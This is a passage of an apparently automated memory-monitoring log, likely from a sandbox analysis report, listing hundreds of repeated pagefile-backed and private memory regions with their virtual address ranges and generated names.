pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6889 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6890 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6891 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6892 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6893 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6894 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6895 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6896 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6897 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6898 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6899 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6900 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6901 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6902 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6903 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6904 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6905 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6906 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6907 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6908 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6909 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6910 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6911 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6912 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6913 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6914 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6915 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6916 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6917 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6918 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6919 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6920 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6921 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6922 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6923 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6924 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6925 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6926 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6927 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6928 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6929 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6930 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6931 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6932 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6933 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6934 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6935 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6936 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6937 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6938 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6939 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6940 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6941 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6942 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6943 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6944 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6945 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6946 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6947 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6948 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6949 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6950 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6951 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6952 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6953 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6954 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6955 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6956 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6957 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6958 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6959 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6960 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6961 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6962 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6963 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6964 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6965 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6966 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6967 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6968 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6969 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6970 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 6971 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6972 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6973 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6974 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6975 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 6976 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 6977 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6978 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6979 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6980 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6981 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6982 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6983 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6984 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6985 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6986 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6987 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6988 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6989 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6990 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6991 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6992 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6993 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6994 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 6995 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6996 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6997 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6998 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 6999 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7000 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7001 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7002 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7003 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7004 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7005 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7006 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7007 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7008 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7009 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7010 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7011 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7012 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7013 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7014 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7015 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7016 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7017 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7018 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7019 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7020 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7021 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7022 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 7023 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 7024 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7025 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7026 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7027 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7028 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7029 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7030 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7031 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7032 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7033 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7034 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7035 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7036 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7037 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7038 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7039 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7040 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7041 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7042 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 7043 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7044 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7045 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7046 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7047 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7048 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7049 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7050 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7051 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7052 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7053 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7054 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7055 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7056 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7057 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7058 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7059 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7060 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7061 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7062 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7063 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7064 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7065 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7066 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7067 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7068 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7069 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7070 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7071 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7072 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7073 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7074 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7075 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7076 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7077 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 7078 start_va = 0x530000 end_va = 